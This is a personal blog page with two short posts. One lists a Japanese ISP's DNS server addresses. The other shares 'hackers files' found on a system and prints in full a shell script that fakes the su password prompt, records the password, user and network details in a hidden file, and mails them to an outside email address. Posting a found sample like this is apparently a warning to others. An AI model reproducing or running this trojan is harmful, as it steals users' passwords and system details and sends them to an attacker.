Todd Smith Org

July 6, 2010

Softbank BB DNS Server IP addresses

Filed under: Hacks? — admin @ 2:13 am

I pay a significant amount of money, (around $55/mo) for my 100Mb VDSL connection here at home in Tokyo. I did not wish to pay the $6/mo rental fee to use their router, so I build my own using ClarkConnect. The problem is that they would not give me the DNS information? Are you kidding me? They didn’t even know what “DNS server IP address” was. I talked to two different technical support groups but was very disappointed with the Softbank technical support. Finally, I told them I bought my own router, and they transferred me to the second technical group who told me that there was a $20 fee for configuration setting information. Asses. Anyways, after hacking around a little in the Japanese Router OS, I found what I was looking for. I figured I’d post them here for anyone else who may be looking for them.

218.176.253.65
218.176.253.97

July 5, 2010

fufezanu@yahoo.es

Filed under: Security Technology — admin @ 12:46 pm

Hackers files I’ve found laying around:

/usr/include/gpm2.h
/usr/share/local/cs/rootexec
/usr/share/local/ca/rootexec
~/.ssh/.sh

#!/bin/sh
#
# by CorteZ @ #Linux-Team
#

while [ "$pass" = "" ]; do
echo -en “Password:”
read -s pass
done
if [ $# != 1 ]; then
echo “[`date`]” >> ~/.xdm01 2>/dev/null
echo “[+] User: `id | cut -d”(” -f2 | cut -d”)” -f1` ~ Remote: $1 ~ Parola: $pass” >> ~/.xdm01 2>/dev/null
echo “`/sbin/ifconfig |grep inet`” >> ~/.xdm01 2>/dev/null
cat ~/.xdm01 | mail -s ‘SU report’ fufezanu@yahoo.es 2>/dev/null
/bin/su
unset pass
fi
echo “[`date`]” >> ~/.xdm01 2>/dev/null
echo “[+] User: `id` ~ Parola: $pass” >> ~/.xdm01 2>/dev/null
cat ~/.xdm01 | mail -s ‘SU report’ fufezanu@yahoo.es 2>/dev/null
/bin/su
unset pass

Powered by WordPress